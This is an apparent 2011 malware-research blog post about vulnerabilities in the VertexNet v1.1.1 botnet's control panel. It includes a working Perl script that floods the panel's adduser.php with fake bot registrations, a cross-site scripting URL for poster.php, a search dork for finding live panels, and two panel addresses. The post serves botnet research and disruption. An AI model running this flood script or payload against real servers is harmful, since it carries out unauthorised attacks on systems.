Tuesday 17 May 2011

VertexNet v1.1.1 Loader Vulnerabilities





The 15th i've see this sample: http://vxvault.siri-urz.net/ViriFiche.php?ID=9330



Appear to be a VertexNet bot after a short analysis.

VertexNet v1.1.1 Builder:

Malware call home with 'V32' as user-agent:


Task check




I will not do a full analysis, but it's relatively simple to understand how it's work.
If you want start into malware reversing, i think VertnetNet 1.1.1 is a good exercise.

Well, to return on the original subject the adduser.php is not protected against flood attack.
So here is a short perl script for exploit that:

#!/usr/bin/perl
# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ

use HTTP::Request;
use LWP::UserAgent;

$URL = "http://localhost/Panel/adduser.php";

$useragent = LWP::UserAgent -> new();
$useragent -> agent('V32');

$try = 0;

    while(1)
    {
        $rnd = rand();

        $request = HTTP::Request -> new(GET => $URL . '?uid={' . $rnd . '}&lan=127.0.0.1&cmpname=Xyl2k!&country=Fran.ais%20(France)%20+33&cc=FR&idle=0&ver=v1337');
        $response = $useragent -> request($request);

        if ($response -> is_success)
        {
                $try++;
                print("[~] The fire day " . $try . "\n");
        }
    }

And poster.php appear also vulnerable to xss (without being logged into the C&C)
http://localhost/Panel/poster.php?uid=XSS



VertexNet Panel can easily be dorked in google, somthing like intitle:"VertexNet v1.1"+intext:"Username :"
http://vertex.net23.net/VertexNet/
http://www.mynewurl.co.cc/vertex/Panel/
etc..
 who want send abuse ? :)

For terminate, here is the music of the builder :þ




1 comment: